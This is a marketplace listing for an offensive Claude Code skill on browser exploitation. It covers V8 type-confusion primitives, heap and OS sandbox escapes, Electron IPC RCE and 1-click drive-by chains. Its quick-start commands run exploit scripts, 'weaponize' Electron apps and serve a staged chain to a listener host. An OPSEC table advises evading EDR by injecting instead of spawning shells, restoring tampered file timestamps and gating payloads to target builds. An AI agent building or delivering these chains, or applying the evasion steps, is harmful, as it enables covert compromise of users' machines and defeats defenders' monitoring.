agentsclimarketplace

Browser exploitation

Skill hypnguyen1209/offensive-claude/skills/browser-exploitation

Offensive security toolkit for Claude Code covering red team, exploit dev, AD attacks, EDR bypass, mobile pentest

Install
npx -y skills add hypnguyen1209/offensive-claude --skill browser-exploitation

Assembled from the repository path, not quoted from the project. Check it against their README if it does not work.

What its author says it does

Copied from the file, not written here

Use when building a client-side browser exploit — V8/JSC JIT type confusion to renderer R/W, V8 heap-sandbox escape, renderer-to-browser sandbox escape (Mojo IPC, GPU/Dawn/ANGLE), Electron/webview IPC abuse, 1-click RCE chains

SKILL.md

9.6 KB, as published. Nobody here has run it

Browser & Client-Side Exploitation

Turn a single client-side bug into full host compromise. The modern browser is a chain target: a JS-engine bug yields an in-renderer arbitrary read/write, the V8 heap sandbox must be escaped to get a native R/W, then a second logic/memory bug in a privileged process (browser broker, GPU) escapes the OS sandbox. Electron and embedded webviews collapse several of these steps. Every cluster pairs the offensive primitive with renderer-crash/IPC telemetry, Sigma/EDR detection, and cleanup OPSEC.

When to Activate

  • A V8/JavaScriptCore bug (type confusion, OOB, UAF, JIT mis-speculation) must become addrof/fakeobj and an in-renderer arbitrary R/W.
  • An in-renderer R/W exists but is trapped inside the V8 heap sandbox (pointer compression) and needs a trusted-pointer / Wasm-object escape to native memory.
  • A renderer is fully compromised and you need to escape the OS sandbox via Mojo IPC handle/logic bugs or the GPU process (Dawn/WebGPU, ANGLE).
  • Auditing or exploiting an Electron / CEF / WebView2 app: contextIsolation/nodeIntegration/sandbox misconfig, preload-bridge & IPC abuse, ASAR/fuse/snapshot tampering.
  • Assembling a 1-click drive-by RCE chain (renderer → sandbox escape → host) for an authorized red-team delivery, or doing cross-engine (Safari/JSC) work.
  • Patch-diffing a Chrome/V8/WebKit security release to build an n-day client-side exploit.

Technique Map

TechniqueATT&CKCWEReferenceScript
JIT type confusion (TurboFan/Maglev/Turboshaft)T1203CWE-843references/v8-jit-typeconfusion.mdscripts/v8_typer.js
Element-kind confusion -> addrof/fakeobjT1203CWE-843references/v8-jit-typeconfusion.mdscripts/v8_typer.js
OOB read/write on JSArray/TypedArrayT1203CWE-787references/v8-jit-typeconfusion.mdscripts/v8_typer.js
In-renderer arbitrary R/W (fake TypedArray)T1203CWE-787references/v8-jit-typeconfusion.mdscripts/v8_typer.js
V8 heap-sandbox escape via raw Wasm pointerT1203CWE-787references/v8-sandbox-escape.mdscripts/sandbox_escape.js
Trusted Pointer Table / WasmExportedFunctionData abuseT1203CWE-843references/v8-sandbox-escape.mdscripts/sandbox_escape.js
Code/exec via Wasm JIT region pivotT1203CWE-94references/v8-sandbox-escape.mdscripts/sandbox_escape.js
Mojo IPC handle-confusion sandbox escapeT1203CWE-269references/renderer-to-browser-escape.mdscripts/mojo_fuzz_harness.py
GPU-process UAF/OOB (Dawn/WebGPU, ANGLE)T1203CWE-416references/renderer-to-browser-escape.mdscripts/mojo_fuzz_harness.py
Mojo interface fuzzing for broker bugsT1203CWE-20references/renderer-to-browser-escape.mdscripts/mojo_fuzz_harness.py
Electron contextIsolation/IPC bridge RCET1059.007CWE-1188references/electron-webview-rce.mdscripts/electron_audit.py
nodeIntegration / webviewTag preload abuseT1059.007CWE-829references/electron-webview-rce.mdscripts/electron_audit.py
ASAR integrity / fuse / V8 snapshot tamperT1574.002CWE-345references/electron-webview-rce.mdscripts/electron_audit.py
XSS/open-redirect -> Electron RCET1189CWE-79references/electron-webview-rce.mdscripts/electron_audit.py
1-click drive-by chain deliveryT1189CWE-693references/clientside-rce-chains.mdscripts/chain_server.py
Cross-engine (JSC/WebKit) primitive portT1203CWE-843references/clientside-rce-chains.mdscripts/chain_server.py

Quick Start

# 0. Pin the exact target build (Chrome/Edge/Electron all carry a V8 version)
#    chrome://version  | edge://version  | electron --version
jsvu --engines=v8                                   # local d8 of matching version
./scripts/d8_debug.sh ./d8 ./poc.js                 # d8 w/ exploit-friendly flags

# 1. Engine bug -> in-renderer R/W  (see references/v8-jit-typeconfusion.md)
d8 --allow-natives-syntax --shell ./scripts/v8_typer.js
#   yields addrof(), fakeobj(), read64()/write64() inside the V8 heap cage

# 2. Escape the V8 heap sandbox -> native R/W  (references/v8-sandbox-escape.md)
d8 --no-sandbox-testing-mode ./scripts/sandbox_escape.js   # local test;
#   on a real build: abuse trusted Wasm object raw pointer -> overwrite RWX Wasm code

# 3. Escape the OS sandbox: Mojo broker logic bug OR GPU-process memory bug
python3 scripts/mojo_fuzz_harness.py --interface FileSystemAccess --iters 100000

# 4. Electron / webview target: audit + weaponize
python3 scripts/electron_audit.py /path/to/app.asar      # finds nodeIntegration/IPC/fuse gaps
#   craft IPC/preload payload from the report; package XSS->RCE

# 5. Stage the full 1-click chain and serve it
python3 scripts/chain_server.py --stage1 renderer.js --stage2 escape.js --lhost 10.0.0.5 --lport 8080

OPSEC & Detection (summary)

TechniqueTelemetry/IOCDetection (Sigma/EDR)OPSEC note
JIT type confusionRenderer crash dumps (chrome_crashpad, crashpad_handler), GPU/renderer restarts, *-crash in ~/AppData/Local/.../CrashpadSigma: spike in renderer crash reports; EDR on crashpad_handler burstsSpray/clean up corrupted arrays; bail without crashing on failed type-check; do not leave %DebugPrint calls
V8 sandbox escapeNative R/W faults if math is off; abnormal RWX Wasm pagesEDR: RWX region churn inside chrome.exe/renderer; ETW VirtualProtect to RWXKeep corruption inside the cage until the last step; reuse existing RWX Wasm code page rather than allocating new
Mojo broker escapeBrowser process spawning cmd.exe/powershell.exe/rundll32.exe; unexpected file writes by brokerSigma: chrome.exe/msedge.exe parent -> shell child; EDR child-process rule; Mojo message auditLive off the broker's own capabilities (file write, process launch); avoid spawning a console child — inject instead
GPU-process bugGPU process crashes (--type=gpu), Dawn/ANGLE asserts, DXGI/Metal faultsEDR on GPU-process child anomalies; WebGPU enabled via policy = surfaceTest against the right GPU backend (D3D11/Metal/Vulkan); fail closed without crashing the GPU process
Electron IPC/preload RCEapp.asar mtime change, node child of Electron app, child_process.execSigma: Electron app spawning shells; FIM on app.asar/snapshot blobsPrefer in-process JS exec (require gadget) over child_process; restore app.asar mtime after fuse/snapshot tamper
Drive-by chain deliverySuspicious text/html with large encoded JS, WebSocket/long-poll to attacker host, UA-gated contentProxy/Sigma on long base64/%u blobs in HTML; JA3/JA4 of staging hostUA/feature gate so only the exact target build receives stage-2; single-use, expiring URLs

Deep Dives

  • references/v8-jit-typeconfusion.md — V8 object model, Map/element-kinds, TurboFan/Maglev/Turboshaft speculation bugs; CVE-2024-4947/5274, CVE-2025-2135/5419/10585 patterns. Build addrof/fakeobj and an in-cage arbitrary R/W via a fake TypedArray. Backed by v8_typer.js, d8_debug.sh.
  • references/v8-sandbox-escape.md — The V8 heap sandbox (pointer compression, external-pointer & trusted-pointer tables); escaping via raw pointers in Wasm objects (WasmIndirectFunctionTable / Liftoff), Trusted Pointer Table abuse, and pivot to RWX Wasm code. Backed by sandbox_escape.js.
  • references/renderer-to-browser-escape.md — Escaping the OS sandbox: Mojo IPC handle-confusion logic bugs (CVE-2025-2783 ForumTroll, CVE-2025-4609 ipcz), GPU-process memory bugs (Dawn/WebGPU, ANGLE CVE-2025-6558), fuzzing Mojo interfaces. Backed by mojo_fuzz_harness.py.
  • references/electron-webview-rce.md — Electron/CEF/WebView2 model; nodeIntegration/contextIsolation/sandbox matrix, preload-bridge & IPC abuse, deprecated webviewTag, ASAR integrity bypass (CVE-2025-55305) and V8 snapshot/fuse tampering, XSS->RCE. Backed by electron_audit.py.
  • references/clientside-rce-chains.md — Stitching primitives into a reliable 1-click chain; staged delivery, UA/feature gating, reliability hardening, cross-engine (JSC/WebKit CVE-2025-43529) primitive porting, patch-diffing for n-days. Backed by chain_server.py.

Keep looking

Skills are one crate of 328,083. Ordering is by how many stacks a row turns up in, so the top of any crate is what has actually been picked rather than what has the most stars.